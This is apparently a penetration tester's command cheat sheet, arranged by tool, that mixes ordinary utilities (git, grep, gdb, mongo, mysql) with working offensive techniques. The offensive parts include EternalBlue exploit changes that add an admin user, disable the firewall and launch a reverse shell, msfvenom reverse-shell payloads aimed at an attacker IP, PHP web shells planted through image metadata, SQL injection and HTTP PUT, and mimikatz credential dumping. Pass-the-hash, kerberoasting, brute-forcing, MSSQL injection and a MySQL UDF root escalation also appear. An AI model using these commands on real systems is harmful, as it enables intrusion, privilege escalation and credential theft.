rlwrap nc -lnvp port_here
## run exploit
python MS17-010/eternalblue_exploitversion_here.py target_IP_here /path/to/sc_all.bin
# zzz_exploit
## modify exploit : smb_pwn()
### optional : comment out file creation
### create new user on target
service_exec(conn, r'cmd /c net user user_name_here password_here /add')
### elevate new user's privs
service_exec(conn, r'cmd /c net localgroup administrators user_name_here /add')
### optional : disable firewall
service_exec(conn, r'cmd /c netsh firewall set opmode disable')
service_exec(conn, r'cmd /c netsh advfirewall set allprofiles state off')
### write rev shell to disk on target
smb_send_file(smbConn, '/local/path/to/rev/shell', 'C', '/remote/path/to/rev/shell')
### execute rev shell
service_exec(conn, r'cmd /c C:\remote\path\to\rev\shell')
## setup listener
rlwrap nc -lnvp port_here
## run exploit
python MS17-010/zzz_exploit.py target_IP_here
# get shell on IP_here as user
evil-winrm -i IP_here -u user -p password
# convert .exe to .cmd
exe2hex -x binary_here.exe -p binary_here.cmd
# add php web shell to image
exiftool -Comment='<?php system($_GET['cmd']); ?>' /path/to/image/here
# call shell
http://upload_url_here/file_name_here?cmd=command_here
# enumerate files
ffuf -w /path/to/wordlist.txt -u http://IP_here/FUZZ -e .txt,.php,.html
# filter out responses with a certain number of words
ffuf -w /path/to/wordlist.txt -u http://IP_here/FUZZ -fw number_here
# filter out responses with a certain size
ffuf -w /path/to/wordlist.txt -u http://IP_here/FUZZ -fs size_here
# filter out responses with a certain status code
ffuf -w /path/to/wordlist.txt -u http://IP_here/FUZZ -fc code_here
# read raw HTTP request from file
ffuf -w /path/to/wordlist.txt -request file_here
# fuzz with cookies (e.g. authentication)
ffuf -w /path/to/wordlist.txt -u http://URL_here/FUZZ -b "cookie_here: value_here; another_cookie_here: value_here"
# fuzz with headers
ffuf -w /path/to/wordlist.txt -u http://URL_here/FUZZ -H "header_here: value_here" -H "another_header_here: value_here"
# fuzz through burp as proxy
ffuf -w /path/to/wordlist.txt -u http://IP_here/FUZZ -x http://127.0.0.1:8080
ffuf -w /path/to/wordlist.txt -u http://IP_here/FUZZ -x socks5://127.0.0.1:8080
# fuzz subdomains
ffuf -c -w /path/to/wordlist.txt -u http://IP_here/FUZZ -H "Host: FUZZ.domain.here" -mc 200
# bulk fuzz list of subdomains
host="sub1,sub2,sub3,sub4,sub5,sub6,sub7"
for i in $(seq 1 1 7); do a=$(echo $host | cut -d , -f $i) && b="https://${a}.domain.here/FUZZ" && echo $b && ffuf -w /path/to/wordlist.txt -u $b -v -t 1; done
# run google search from CLI
firefox --search "search_term_here"
# start flameshot
flameshot gui
# start flameshot with save path
flameshot gui -p /path/to/save
# capture with delay
flameshot gui -d ms_here
# capture full screen
flameshot full
# capture full screen + copy to clipboard
flameshot full -c
# change color
<right click>
# change line thickness
<scroll>
# ping sweep
fping -a -g IP_range 2>/dev/null
# list drives
fsutil fsinfo drives
# create new file
fsutil file createnew file_name_here file_size_here
# connect
ftp IP_here
# connect in passive mode
ftp -p IP_here
pftp IP_here
# change into passive mode
quote PASV
# file upload
put /path/to/local/file [/path/remote]
# file download
get /path/to/remote/file
# bulk download files
binary
prompt OFF
mget *
# change to binary mode
binary
# rename file
rename old_file_name new_file_name
# non-interactive ftp session, read commands from file (1 line = 1 command)
ftp -v -n -s:file_here.txt
# transfer file Win / ftp client -> Lin / ftp server
## setup ftp server on Lin
mkdir ftphome
sudo systemctl start pure-ftpd
sudo systemctl restart pure-ftpd # id service already running
## prepare ftp commands on Win or interact with ftp prompt
echo open IP_here 21 > ftp_commands.txt
echo USER user_name_here >> ftp_commands.txt
echo password_here >> ftp_commands.txt
echo bin >> ftp_commands.txt
echo GET filename_here >> ftp_commands.txt
echo bye >> ftp_commands.txt
## start session on Win
ftp -v -n -s:ftp_commands.txt
# read file on ftp server
get /path/to/file -
# get gcc version info
gcc -v
# cross-compile for 32-bit
gcc -m32 source.c -o outfile
# get gcc specs
gcc --dumpspecs
# set syntax to intel (peda default)
peda.execute("set disassembly-flavor intel")
# run vulnerable program in debugger
gdb ./vulnerable
gdb -q ./vulnerable # quiet
# run program + display pid
program_here &
# attach gdb to running process
gdb -q -p pid_here
# debug core dump produced by program
gdb program_here core_here
# run program with arguments
run arg_here another_arg_here
r arg_here another_arg_here
# run program while reading input from file
run < input_file.here
r < input_file.here
# disassemble function
disas function_name_here
# set breakpoint
b *0xmemory_address_here
break *0xmemory_address_here
b function_name_here
break function_name_here
# show content of register / variable / memory location
p $register_name_here
print $register_name_here
## get function address
p function_name_here
p system # system function from libc
p exit # exit function from libc
# display content of all registers
info registers
# step over (execute program until next line in source code)
s
step
# step into (execute exactly one instruction)
stepi
# continue execution after hitting breakpoint
c
continue
# examine memory
x/numer_of_units_here data_type_here location_name_here
x/2i $eip # examine 2 instructions starting from where eip points to
x/2w $eip # examine 2 words starting from where eip points to
# examine stack at crash
x/8wx $esp # examine 8 words starting from where esp points to
# pattern create
pattern create length_here pattern.txt
run < pattern.txt
# pattern offset
pattern offset 0xmemory_address_here
# kill running program
k
kill
# show functions + their memory addresses (not stripped binary only)
info functions
# find string in program memory
find string_here
## no convenient function in memory? set ENV variable --> will be on stack (local exploitation only!)
export SHELL='/bin/bash'
# exit gdb
q
quit
# list branches
git branch
# create new branch
git checkout -b branch_name_here
# stash local changes, pull repo, pop local changes back
git stash
git pull
git stash pop
# show commit history
git log
# clone local repo
git clone file:///path/to/repo/
# clone over ssh
GIT_SSH_COMMAND='ssh -i /path/to/private/key -p port_here' git clone git@IP_here:/path/to/git/repo
GIT_SSH_COMMAND='ssh -i /path/to/private/key' git clone git@IP_here:/path/to/git/repo
# push over ssh
## config (if required)
git config --global user.name "muemmelmoehre"
git config --global user.email "muemmel@moehre"
## push
GIT_SSH_COMMAND='ssh -i /path/to/private/key -p port_here' git push origin master
GIT_SSH_COMMAND='ssh -i /path/to/private/key' git push origin master
# create pull request
## clone project
git clone https://repo_url_here
## create new branch
git branch new_branch_name_here
## switch to new_branch
git checkout new_branch
## add user config
git config user.email "user@mail.com"
git config user.name "git_username_here"
## commit changes
git status
git add .
git commit -m "meaningful comment here"
## set upstream branch fore new_branch + push changes
git push --set-upstream origin new_branch
## in GUI: create pull/merge request
# enumerate web folders
gobuster dir -u http://IP_here -w /path/to/wordlist
# skip SSL certificate verfication
gobuster dir -u http://IP_here -w /path/to/wordlist -k
# fuzz subdomains
gobuster dns -d target_domain_here -w /path/to/wordlist
gobuster vhost -u http://domain_here -w /path/to/wordlist
gobuster vhost -u http://domain_here -w /path/to/wordlist -r -k |grep -v "(Status: 400)"
# print line
import ("fmt")
fmt.Println("Print this line.")
const some_string = "some string here"
var some_other_string = "some other string"
fmt.Println("Printing ", some_string, "and ", some_other_string, ".")
# URL
inurl:(extension_here|other_extension_here)
# page title
intitle: "keyword_here" "other_keyword_here"
# hostname
site:www.domain.com
site:com
# file type
filetype:extension_here
# file extension
ext:extension_here
# logical operators
AND
OR
&
|
# filter out keyword
-keyword_here
# decrypt password from group policy preferences
gpp-decrypt ciphertext_here
# set HTTP header in playground
{
"Authorization": "Bearer jwt_here"
}
# grep recursively for search_term_here
grep -r search_term_here /path/to/search/directory
# grep and keep colored output
grep search_term_here --color=always | less -R
# grep for lines starting with search term
grep '^search_term_here'
# display x lines after search_term
grep -A x search_term_here
# display x lines before search_term
grep -B x search_term_here
# display x lines before and after search_term
grep -C x search_term_here
# ignore case
grep -i search_term_here
# do not search binary files
grep -I search_term_here
# select non-matching lines
grep -v search_term_here
# print line numbers
grep -n search_term_here
# search for exploits
grep -r -i -l search_term_here /usr/share/exploitdb/exploits/
# grep man page for switch
grep -- -switch_here
grep -w -- -switch_here
grep -we -- -switch_here
# grep for IPv4
grep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" file_to_grep_here
# permute words in wordlist
hashcat --force --stdout wordlist.txt -r /usr/share/hashcat/rules/best64.rule
# crack hash (with salt : append salt after hash in file : hash_here:salt_here)
hashcat -m hash_format_code_here /path/to/hash /path/to/wordlist
# crack NTLM hash captured with responder
hashcat -m 5600 /path/to/hash /path/to/wordlist
# show cracked NTLM hashes
hashcat -m 1000 /path/to/hash --show
# identify hash type
hashid 'hash_here'
# setup project environment
stack new project_name_here simple
cd project_name_here
stack setup
# haskell shebang
#!/usr/bin/env stack
# start REPL
stack ghci
# start REPL with specific package
stack ghci --package package_name_here
# quit REPL
:quit
# load code from Main.hs in REPL
:load Main
# reload in REPL after changes
:r
:reload
# run main in REPL
main
# build executable
stack build
# run executable
stack exec project_name_here
# attach .dmg
hdiutil attach /path/to/dmg
cd /path/to/volume
# detach .dmg
hdiutil detach /path/to/volume
# find IP
host url_here
# find hostname
host IP_here domain_server_here
# request mail server for domain
host -t mx domain_here
# request name server for domain
host -t ns domain_here
# request text record for domain
host -t txt domain_here
# zone transfer
host -l domain_here name_server_here
# generate apr1 hash (e.g. webdav)
htpasswd -nmb username_here password_here
# dictionary attack
hydra -L users.txt -P passwords.txt <protocol://IP_here> <options>
hydra -l user_name_here -P /path/to/wordlist <protocol://IP_here> <options>
# dictionary attack - web form
hydra -l user_name_here -p /path/to/wordlist url_here http-form-post "/path/to/login/form:user_name_param=^USER^&password_param=^PASS^&submit=Login:error_message_upon_failed_login_here"
# brute-force Oracle TNS listener password
hydra -P wordlist_here -t number_of_threads_here -s 1521 IP_here oracle-listener
# brute-force SIDs ORacle TNS listener password
hydra -L SID_wordlist_here -s 1521 IP_here oracle-sid
# brute-force RDP
hydra -L users.txt -P passwords.txt rdp://IP_here -t 1
# start
/path/to/icsim vcan0
/path/to/controls vcan0
# start with randomized values
/path/to/icsim -r vcan0
/path/to/controls -s seed_here vcan0
# full path
/usr/sbin/ifconfig -a
# show specific interface
ifconfig interface_here
# get TGT for users with UF_DONT_REQUIRE_PREAUTH
/path/to/impacket/examples/GetNPUsers.py domain/ -usersfile /path/to/users.txt -no-pass -outputfile /path/to/tgt.txt
# dump secrets as user
/path/to/impacket-secretsdump -dc-ip IP_here user:password@IP_here
# dump hashes from SYSTEM, SAM, SECURITY registry files
/path/to/impacket-secretsdump -sam /path/to/copy/of/sam -system /path/to/copy/of/system -security /path/to/copy/of/security LOCAL
# kerberoasting : gather NTLM hashes
/path/to/impacket/examples/GetUserSPNs.py -request -dc-ip IP_here domain/user
# gather domain usernames
/path/to/impacket/GetADUsers.py -all -dc-ip IP_here domain/user
# get shell as user
/path/to/impacket/psexec.py domain/user@IP_here
impacket-psexec username_here:password_here@IP_here
# create public share for file transfer Win <--> Lin
## setup share on Lin
sudo /path/to/impacket-smbserver share_name_here full_path_here
## mount share on Win
### powershell
New-PSDrive -Name "share_name_here_can_be_different_from_above" -PSProvider "FileSystem" -Root "\\Lin_IP_here\share_name_here"
### cmd
net use unused_letter_here: \\Lin_IP_here\share_name_here
net use \\Lin_IP_here\share_name_here
## access drive
cd \\Lin_IP_here\share_name_here_can_be_different_from_above\
## load file from share + execute in memory
//Lin_IP_here/share_here/file_here arg_here
## copy file from share to box
copy //Lin_IP_here/share_here/file_here C:\path\to\file\on\box
## copy file from box to share
copy C:\path\to\file\on\box //Lin_IP_here/share_here/file_here
# rpcdump
/path/to/impacket/rpcdump -port 135 IP_here
/path/to/impacket/rpcdump -port 139 IP_here
/path/to/impacket/rpcdump -port 445 IP_here
# pass-the-hash
## LM : aad3b435b51404eeaad3b435b51404ee
impacket-psexec domain_here/user_name_here@IP_here -hashes LM_hash_here:NTLM_hash_here
# put interface in monitoring mode ("wifi promiscuous mode")
iwconfig # get interface name
ip link set interface_here down
iw interface_here set type monitor
iw interface_here set txpower fixed 3000 # optional
ip link set interface_here up
# put interface in managed mode (deactivate monitoring mode)
ip link set interface_here down
iw interface_here set type managed
ip link set interface_here up
# read out local DNS cache
ipconfig /displaydns
# display full config
ipconfig /all
# purge DNS resolver cache
ipconfig /flushdns
# set all counters to zero
sudo iptables -Z
# insert new rule for allowed incoming traffic on top
sudo iptables -I INPUT 1 -s source_here -j ACCEPT
# insert new rule for allowed outgoing traffic on top
sudo iptables -I OUTPUT 1 -d destination_here -j ACCEPT
# list all rules
sudo iptables -L
sudo iptables-save
# delete all rules
sudo iptables -F
# delete specific rule
sudo iptables -D complete_rule_here
# view traffic (by rule)
sudo iptables -nv -L
# connect to server
nc -nvvv IP_here port_here
echo "command_here" | nc -nvvv IP_here port_here
# authenticate to server (all values can be random)
PASS password_here
NICK nick_name_here
USER user_name_here host_name_here server_name_here :real_name_here
# sign apk :
## generate private key
keytool -genkey -v -keystore keystore_here -alias alias_here -keyalg RSA -keysize 2048 -validity 7400
keytool -genkey -alias domain_here -keyalg RSA -keysize 4096 -validity 7300 -keystore keystore_here.jks -storepass password_here
## sign
jarsigner -sigalg SHA1withRSA -digestalg SHA1 -keystore keystore_here path/to/apk app_lias_here
# verify signature
jarsigner -verify -verbose -certs /path/to/apk
# crack password hash - dictionary attack
john -w=/path/to/wordlist /path/to/hash
# crack password hash with mangling - dictionary attack
john -w=/path/to/wordlist --rules /path/to/hash
# crack password hash - brute-force attack
john -incremental -users:user_here /path/to/hash
# create mangled wordlist
john -w=/path/to/wordlist --rules --stdout > /path/to/mangled/outfile.txt
# unshadow
unshadow passwd_file shadow_file > output_file
# show cracked passwords
john --show /path/to/hash
# convert kdbx to john
keepass2john db_here.kdbx
# convert password protected rar to john
rar2john rar_here.rar >rar_hash
# convert password protected pdf to john
pdf2john pdf_here.pdf >pdf_hash
# convert .jks keystore to john
keystore2john jks_here.jks >jks_hash
# crack keystore
john --format==keystore jks_hash
# edit rules
## open conf file
sudo nano /etc/john/john.conf
## add rule description here
new_rule_here
# run multi-process john
john --fork=number_of_processes_here -w=/path/to/wordlist /path/to/hash
# pretty print json file
cat /path/to/json | jq .
jq . /path/to/json
# extract attribute
cat /path/to/json | jq '.[].attribute_here'
jq '.[].attribute_here'
# convert content_attribute from json to pdf
jq -r '.[].content_attribute_here' /path/to/json | base64 -d >/path/to/pdf
# compile / download exe for arch + upload to victim via low priv shell
# generate new reverse shell + upload to victim
## x86
msfvenom -p windows/shell_reverse_tcp LHOST=attacker_IP LPORT=port_here -f exe -a x86 -o shell.exe
## x64
msfvenom -p windows/x64/shell_reverse_tcp LHOST=attacker_IP LPORT=port_here -f exe -a x64 -o shell.exe
# start listener on attacker machine
rlwrap nc -lnvp port_here
# call juicy potato
## x86
C:\path\to\Juicy.Potato.x86.exe -l port_here -p C:\path\to\rev\shell.exe -t * -c {6d18ad12-bde3-4393-b311-099c346e6df9}
## x64
C:\path\to\JuicyPotato.exe -l port_here -p C:\path\to\rev\shell.exe -t * -c {6d18ad12-bde3-4393-b311-099c346e6df9}
# get users with Service Principal Names (SPNs)
GetUSerSPN.ps1
# Get service ticket
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestSecurityToken -ArgumentList "SPN_here"
# extract tickets
mimkatz # kerberos::list /export
# crack tickets
./tgsrepcrack.py /path/to/wordlist /path/to/kirbi
# convert kirbi to john
/path/to/kirbi2john.py /path/to/kirbi > out_file_here
# crack
john -w=/path/to/wordlist /path/to/john/file
# enumerate AD users
nmap --script krb5-enum-users --script-args krb5-enum-users.realm='domain.here' IP_here -p 88
nmap --script krb5-enum-users --script-args krb5-enum-users.realm='domain.here',userdb=/path/to/list/of/usernames IP_here -p 88
# enumerate AD users
kerbrute userenum /path/to/list/of/usernames -d domain.here --dc DC_IP_here
# add DNS entry via LDAP (AD)
python3 /path/to/krbrelayx/dnstool.py -u "domain_here\user_name_here" -p password_here -r site_name_here.domain.here -a add -d attacker_IP_here target_IP
# query DNS entry via LDAP (AD)
python3 /path/to/krbrelayx/dnstool.py -u "domain_here\user_name_here" -p password_here -r site_name_here.domain.here -a query target_IP
# launch all modules
lazagne.exe all
# launch module_here
lazagne.exe module_here
# write results to file
lazagne.exe all -oN /path/to/outfile
# help
lazagne.exe -h
lazagne.exe module_here -h
# dump domain info as user
ldapdomaindump -u "domain_here\user_name_here" -p password_here domain_name_here
# find users with TRUSTED_FOR_DELEGATION flag
grep TRUSTED_FOR_DELEGATION domain_users.grep
# nmap script
nmap --script ldap-search IP_here
# return all user attributes
ldapsearch -v -x -h IP_here -b 'dc=domain_here,dc=dc2_here' -s base'(objectclass=*)'
ldapsearch -v -x -h IP_here -b 'dc=domain_here,dc=dc2_here' -s base'(objectclass=*)' -p port_here
ldapsearch -LLL -x -H ldap://IP_here -b '' -s base'(objectclass=*)'
# scope : subtree
ldapsearch -x -h IP_here -s sub -b 'dc=domain_here,dc=dc2_here'
# get domain name
ldapsearch -x -h IP_here -s base namingcontexts
# LAPS? search for local admin passwords
ldapsearch -v -x -D username_here@domain.here -w password_here -b 'dc=domain_here,dc=dc2_here' -h IP_here "(ms-MCS-AdmPwd=*)"
# connect to FTPS
lftp
set ftp:ssl-force true; set ftp:ssl-protect-data true; set ssl:verify-certificate/fingerprint_here no; open ftps://IP_here:990
# get fingerprint
lftp
set ftp:ssl-force true; set ftp:ssl-protect-data true; open ftps://IP_here:990
# activate thorough tests
/path/to/linenum.sh -t
# search keyword
/path/to/linenum.sh -k keyword_here
# copy interesting files to export folder
/path/to/linenum.sh -e export_folder_here
# do not prompt for password
/path/to/lse.sh -i
# increase level of detail
/path/to/lse.sh -l 1 # relevant infor for priv esc
/path/to/lse.sh -l 2 # complete info dump
# include images
![file_name_here](/path/to/image.png)
# include footnote
[^footnote_number_here]: [title_here](url_here)
# include url
[description_here](url_here)
# brute force login
medusa -h target_IP -u user_name_here -p password-here -M module_here -m module_param_here
medusa -h target_IP -U /path/to/user_name_list -P /path/to/wordlist -M module_here -m module_param_hereà
# list modules
medusa -d
# get cmd shell
shell
# get powershell shell
load powershell
powershell_shell
# local port forwarding : forward traffic directed to local_port to target_port on target_IP
portfwd add -l local_port_here -r target_IP_here -p target_port_here
# setup : start logging + enable SeDebugPrivilege (tamper with other processes)
log
privilege::debug
# priv esc from Administrator to SYSTEM via token impersonation (if mimikatz launched as Administrator)
token::elevate
# list available tokens (= logged in users)
token::list
# dump hashes from SAM / dump NTLM hashes
lsadump::sam
lsadump::sam /system:SYSTEM /sam:SAM
# dump secrets
lsadump::secrets
# ask DC to synchronize --> grab password for account
lsadump::dcsync /user:user_name_here
# dump credentials of logged-on users
sekurlsa::logonpasswords
# grab current user's tickets
sekurlsa::tickets
# get service ticket + write to disk (.kirbi)
kerberos::list /export
# list certificates
crypto::certificates
# cross-compile C for Windows on Linux - 32-bit
i686-w64-mingw32-gcc /path/to/source.c -o /path/to/out.exe
# cross-compile C for Windows on Linux - 64-bit
x86_64-w64-mingw32-gcc /path/to/source.c -o /path/to/out.exe
# cross-compile C++ for Windows on Linux - 32-bit
i686-w64-mingw32-g++ /path/to/source.cpp -o /path/to/out.exe
# cross-compile C++ for Windows on Linux - 64-bit
x86_64-w64-mingw32-g++ /path/to/source.cpp -o /path/to/out.exe
# set up proxy server
mitmproxy -p listener_port_here
# intercept request
i # prompts prefilled command
~u keyword_or_regex_here
ENTER
# send request
a
# drop request
X
# modify request
e
<choose element to modify>
ENTER
<modify>
ESC
# see details
ENTER
# replay request
r # nb: updates line
# display modules + their memory protections
!mona modules
# find hex_opcode_here in module - e.h. \xff\xe4 = JMP ESP
!mona find -s "hex_opcode_here" -m dll_here
# connect to mongoDB database
mongo # connect to localhost
mongo IP_here
mongo IP_here/db_name_here
mongo IP_here:port_here
mongo IP_here:port_here/db_name_here
mongo -u user_here -p password_here IP_here:port_here/db_name_here
# list databases
show dbs
# use database
use db_name_here
# insert statement
db.collection_name_here.insert({"key":"value"})
db.collection_name_here.insert({"key":"value","key":"value"})
# retrieve data
db.collection_name_here.find() # all
db.collection_name_here.find().pretty() # pretty print
db.collection_name_here.find({"key":"value"}) # specific value
# delete entry
db.collection_name_here.remove({"key":"value"})
# drop collection
db.collection_name_here.drop()
# drop database
db.dropDatabase()
# current database
db
# version
db.version()
# run system commands
run("command_here","arg_here") # can act as a shell
# create db
use db_name
# create collection
db.createCollection("collection_name_here")
# get stats
db.hostInfo()
db.serverStatus()
# kill current openation
db.killOp(opid)
# list all commands
db.listCommands()
# load all scripts in db.system.js
db.loadServerScripts()
# logout
db.logout()
# repair db
db.repairDatabase()
# shutdown server
db.shutdownServer()
# operators
$eq
$ne
$gt
$where # matches documents satisfying javascript expression
$exists # matches documents with specific field
$regex # matches documents satisfyting regex
# import new exploit (Kali)
wget url_to_raw_ruby_exploit
cp ruby_exploit /usr/share/metasploit-framework/modules/exploits/path/to/fitting/category/exploit.rb
# exit msfconsole + restart
# import new exploit (install from git)
wget url_to_raw_ruby_exploit
cp ruby_exploit /opt/metasploit-framework/embedded/framework/modules/exploits/path/to/fitting/category/exploit.rb
# exit msfconsole + restart
# verbose mode
set VERBOSE true
# list available payloads
msfvenom --list payloads
# list available encoders
msfvenom --list encoder
# list available formats
msfvenom --list format
# list options for payload
msfvenom -p payload_here --list-options
# create Windows TCP reverse shell exe - 64-bit (unstaged)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=attacker_IP LPORT=port_here -f exe -a x64 -o shell.exe
# create Windows TCP reverse shell exe - 32-bit (unstaged)
msfvenom -p windows/shell_reverse_tcp LHOST=attacker_IP LPORT=port_here -f exe -a x86 -o shell.exe
# create Windows TCP reverse shell dll - 64-bit (unstaged)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=attacker_IP LPORT=port_here -f dll -a x64 -o shell.dll
# create Windows TCP reverse shell dll - 32-bit (unstaged)
msfvenom -p windows/shell_reverse_tcp LHOST=attacker_IP LPORT=port_here -f dll -a x86 -o shell.dll
# create Windows TCP reverse shell asp (unstaged)
msfvenom -p windows/shell_reverse_tcp LHOST=attacker_IP LPORT=port_here -f asp -o revshell.asp
# create Windows TCP reverse shell hta (unstaged)
msfvenom -p windows/shell_reverse_tcp LHOST=attacker_IP LPORT=port_here -f hta-psh -o revshell.hta
# create Linux TCP reverse shell elf - 64-bit (unstaged)
msfvenom -p linux/x64/shell_reverse_tcp LHOST=attacker_IP LPORT=port_here -f elf -a x64 -o shell.elf
# create Linux TCP reverse shell elf - 32-bit (unstaged)
msfvenom -p linux/x86/shell_reverse_tcp LHOST=attacker_IP LPORT=port_here -f elf -a x86 -o shell.elf
# create TCP reverse shell jsp (unstaged)
msfvenom -p java/jsp_shell_reverse_tcp LHOST=attacker_IP LPORT=port_here -f raw -o shell.jsp
# create TCP reverse shell jsp war (unstaged)
msfvenom -p java/jsp_shell_reverse_tcp LHOST=attacker_IP LPORT=port_here -f war -o shell.war
# create TCP reverse shell as js shellcode (unstaged)
msfvenom -p linux/x64/shell_reverse_tcp LHOST=attacker_IP LPORT=port_here -f js_le -e generic/none # Linux x64
msfvenom -p linux/x86/shell_reverse_tcp LHOST=attacker_IP LPORT=port_here -f js_le -e generic/none # Linux x86
msfvenom -p windows/shell_reverse_tcp LHOST=attacker_IP LPORT=port_here -f js_le -e generic/none # Windows
# create php reverse shell
msfvenom -p php/reverse_php LHOST=attacker_IP LPORT=port_here -o shell.php
# create reverse shell as python shellcode - Windows 32-bit (unstaged)
msfvenom -p windows/shell_reverse_tcp LHOST=attacker_IP_here LPORT=port_here -f py -a x86
# create python reverse shell
msfvenom -p python/shell_reverse_tcp LHOST=attacker_IP LPORT=port_here -o shell.py
# create Windows TCP reverse shell dll -
# find hex opcode for assembly instruction
msf-nasm_shell
assembly_instruction_here
# create unique pattern
msf-pattern_create -l length_here
# create unique pattern from specific set : ABC, def, 123
msf-pattern_create -l length_here -s sets_here
# locate EIP_bytes
msf-pattern_offset -l length_here -q EIP_bytes_here
# connect to a db server as user
mssql -s IP_db_server -o port -u username -p password
sqsh -S IP_here -U user_here -P password_here
# check for nse scripts for mssql
nmap --script-help "*ms* and *sql*"
# check version
SELECT @@version
GO # sometimes only "go" works
# current user
SELECT user_name()
SELECT system_user
SELECT user
SELECT loginame FROM master..sysprocesses WHERE spid=@@SPID
GO
# current database
SELECT db_name()
GO
# list users
SELECT name FROM master..syslogins
GO
# error-based SQLi with cast / convert
## numeric data
cast((SELECT @@version) as int)
convert(int,@@version)
## string
' + cast((SELECT @@version) as int) + '
' + convert(int,@@version) + '
### force conversion to string needed to provoke error? --> concatenation with char
(SELECT TOP 1 CAST(column_here as varchar)%2bchar(64) FROM database_here..table_name_here WHERE column_here NOT IN ('known_data1_here','known_data2_here')); --
## possible replacements for @@version
### database name
db_name() # current db
db_name(0) # current db
db_name(X) # X = 0,1,2,... list db names
### current user
user_name()
### table names
(select+top+1+table_name+from+information_schema.tables) # first table
(select+top+1+table_name+from+information_schema.tables+where+table_name+
not+in+('first_table_name_here','second_table_name_here')) # subsequent tables
(SELECT TOP 1 CAST(name as varchar(4096) FROM database_here..sysobjects WHERE xtype='U' AND name NOT IN ('known_table_name1_here','known_table_name2_here')); --
### column names
(select+top+1+column_name+from+information_schema.columns+where+table_name='table_name_here') # first column
(select+top+1+column_name+from+information_schema.columns+where+table_name='table_name_here'+and+column_name+not+in+('first_column_name_here')) # subsequent columns
(SELECT TOP 1 CAST(database_here..syscolumns.name as varchar(4096) FROM database_here..syscolumns, database_here..sysobjects WHERE database_here..syscolumns.id=database_here..sysobjects.id AND database_here..sysobjects.name=table_name_here AND database_here..sysobjects.name NOT IN ('known_column_name1_here','known_column_name2_here')); --
### dump data
(SELECT TOP 1 CAST(column_here as varchar(4096) FROM database_here..table_name_here WHERE column_name NOT IN ('known_data1_here','known_data2_here')); --
(SELECT TOP 1 CAST(column_here as varchar) FROM database_here..table_name_here WHERE column_name=1); --
# start service
systemctl start mysql.service
# restart service
systemctl restart mysql.service
# stop service
systemctl stop mysql.service
# launch mysql as root
mysql -u root -p
sudo mysql -u root -p
# launch mysql with local database file
sudo mysql -u root -p db_name_here < local_file_here.sql
# launch mysql + execute command
mysql -u root -ppassword_here -e 'command here'
# connect to remote mysql instance
mysql -h IP_here -u root
mysql -h IP_here -u root@localhost
mysql -h IP_here -P port_here -u root
# create new database
create database db_name;
# list existing databases
show databases;
# enter database
use db_name;
# create new table + define columns
create table 'table_name' (column_name1 VARCHAR(20), username VARCHAR(8), email VARCHAR(35), password VARCHAR(25), [...]);
# list existing tables of current database
show tables;
# print out columns
describe table_name_here;
# spawn shell
\! bash
\! sh
# display user-defined functions
select * from mysql.func;
# read file
select load_file('/path/to/file/here');
# list all data from table
select * from 'table_name';
# create new user@localhost
create user 'username'@'localhost' identified by 'password';
# create new user@IP_here
create user 'username'@'IP_here' identified by 'password';
# create new user@IP_wildcard
create user 'username'@'%' identified by 'password';
# grant privileges to user@IP_here for every database
grant all privileges on *.* to 'username'@'IP_here' identified by 'password';
# grant privileges to user@IP_here for every table in db_name database
grant all privileges on 'db_name'.* to 'username'@'IP_here' identified by 'password';
# grant privileges to user@IP_here for table table_name in db_name database
grant all privileges on 'db_name'.'table_name' to 'username'@'IP_here' identified by 'password';
# show privileges for user
show grants for 'username'@'IP_here';
# apply changes to privileges
flush privileges;
# delete user
drop user 'username'@'IP_here';
# comment
#
# version
@@version
# current db user
user()
select user();
# information_schema : get tables
UNION all select 1,...,table_name from information_schema.tables
# information_schema : get table columns
UNION all select 1,...,column_name from information_schema.columns where table_name='table_name_here'
# concatenate colum nnames into one output field
CONCAT(column_name_here,':',another_column_name_here,':',yet_another_column_name_here)
# file read
UNION all select 1,...,load_file('/path/to/file/here')
# write file in web root
UNION all select 1,...,"content_here" into OUTFILE '/path/to/outfile'
# write php shell in web root
UNION all select 1,...,"<?php echo shell_exec($_GET['cmd']);?>" into OUTFILE '/path/to/outfile'
# get shell via user-defined function (UDF) --> https://www.exploit-db.com/exploits/1518
## compile shared object / library
gcc -g -c raptor_udf2.c
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
## connect to db
mysql -u root -p
## access mysql database
use mysql;
## create new table
create table foo(line blob);
## import library
insert into foo values(load_file('/home/raptor/raptor_udf2.so'));
## write library to directory on path
select * from foo into dumpfile '/usr/lib/raptor_udf2.so';
## create UDF
create function do_system returns integer soname 'raptor_udf2.so';
## optional, if file not found error : locate correct folder
### check for other functions
select * from mysql.func;
### note .so name
### return to shell
find /usr -name "*.so" |grep name_here
### return to mysql + repeat above steps with correct path
## check import
select * from mysql.func;
## priv esc to root (if mysqld runs as root!)
select do_system('cp /bin/sh /tmp/rootsh && chmod +s /tmp/rootsh');
## spawn root shell
\! sh
/tmp/rootsh -p
# get mysql version
mysqld --version
# scan network for NBT
nbtscan -r target_range_here
# enumerate host
nbtscan -hv IP_here
nbtscan -r IP_here/32
# NBT name scan
nbtscan target_range_here
# establish connection
nc target_IP port_here
nc -v target_IP port_here
nc -nv target_IP port_here
## send CRLF, not only LF
nc -nvC target_IP port_here
# scan tcp port
nc -nvv -z -w time_out_in_seconds_here target_IP port_here
# scan udp port
nc -nvv -u -z -w time_out_in_seconds_here target_IP port_here
# start listener
nc -lnvp port_here
# transfer file (text + binary)
## listener
nc -lnvp port_here > /path/to/oufile
## sender
nc -nv listener_IP_here port_here < /path/to/file
# banner grabbing (2 empty lines required between headers + body!)
nc target_IP 80 -v
HEAD / HTTP/1.0
# enumerate allowed HTTP verbs
nc target_site 80 -v
OPTIONS / HTTP/1.0
# exploit DELETE
nc target_site 80 -v
DELETE /path/to/resource.txt HTTP/1.0
# exploit PUT with php web shell
nc target_site 80 -v
PUT /payload.php HTTP/1.0
Content-type: text/html
Content-length: 136
<?php
if (isset ($GET['cmd']))
{
$cmd = $_GET['cmd'];
echo '<pre>';
$result = shell_exec($cmd);
echo $result;
echo '</pre>';
}
?>
# bind shell to local port
nc -lnvp port_here -e cmd.exe
